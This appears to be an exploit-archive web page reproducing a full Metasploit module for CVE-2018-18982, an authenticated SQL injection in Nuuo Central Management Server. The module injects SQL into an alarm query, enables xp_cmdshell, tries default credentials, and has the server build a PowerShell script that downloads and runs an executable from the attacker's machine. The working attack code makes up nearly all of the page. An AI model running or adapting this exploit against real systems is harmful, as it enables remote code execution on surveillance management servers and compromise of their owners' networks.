nuuo central management (authenticated) sql server sql injection (metasploit)

▸▸▸ Exploit & Vulnerability >>   remote exploit & windows vulnerability




Online Vulnerability Scanner Tools
nuuo central management (authenticated) sql server sql injection (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::Nuuo
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'            => 'Nuuo Central Management Authenticated SQL Server SQLi',
      'Description'     => %q{
      The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
      This module will either use a provided session number (which can be guessed with an auxiliary
      module) or attempt to login using a provided username and password - it will also try the
      default credentials if nothing is provided.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pedro Ribeiro <pedrib@gmail.com>'  # Vulnerability discovery and Metasploit module
        ],
      'References'      =>
        [
          [ 'CVE', '2018-18982' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]

        ],
      'Platform'        => 'win',
      'Arch'            => ARCH_X86,
      'Stance'          => Msf::Exploit::Stance::Aggressive,  # we need this to run in the foreground
      'Targets'         =>
        [
          [ 'Nuuo Central Management Server <= v2.10.0', {} ],
        ],
      'Notes'           =>
        {
          'SideEffects'   => [ ARTIFACTS_ON_DISK ]
        },
      'Privileged'      => false,  # we run as NETWORK_SERVICE
      'DisclosureDate'  => 'Oct 11 2018',
      'DefaultTarget'   => 0))
    register_options [
      Opt::RPORT(5180),
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
      OptString.new('URIPATH', [true,  'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
    ]
  end


  def inject_sql(sql, final = false)
    sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
    if final
      nucs_send_msg_async(sql)
    else
      nucs_send_msg(sql)
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    unless @pl
      print_error("A request came in, but the payload wasn't ready yet!")
      return
    end
    print_good('Sending the payload to CMS...')
    send_response(cli, @pl)

    Rex.sleep(3)

    print_status('Executing shell...')
    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
    register_file_for_cleanup("c:/windows/temp/#{@filename}")
  end

  def create_hex_cmd(cmd)
    var = rand_text_alpha(2)
    hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
    cmd.each_byte { |b|
      hex_cmd << b.to_i.to_s(16)
    }
    hex_cmd << "; exec (@#{var})"
  end

  def primer
    # we need to roll our own here instead of using the MSSQL mixins
    # (tried that and it doesn't work)
    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
    download_pl = %{xp_cmdshell }
    download_pl << %{'cd C:\\windows\\temp\\ && }
    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}

    print_status('Injecting PowerShell payload')
    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
    register_file_for_cleanup("c:/windows/temp/#{ps1}")
  end

  def exploit
    nucs_login

    unless @nucs_session
      fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
    end

    @pl = generate_payload_exe

    #do not use SSL
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    begin
      Timeout.timeout(datastore['HTTPDELAY']) {super}
    rescue Timeout::Error
      datastore['SSL'] = true if ssl_restore
    end
  end
end

Nuuo central management (authenticated) sql server sql injection (metasploit) Vulnerability / Exploit Source : Nuuo central management (authenticated) sql server sql injection (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.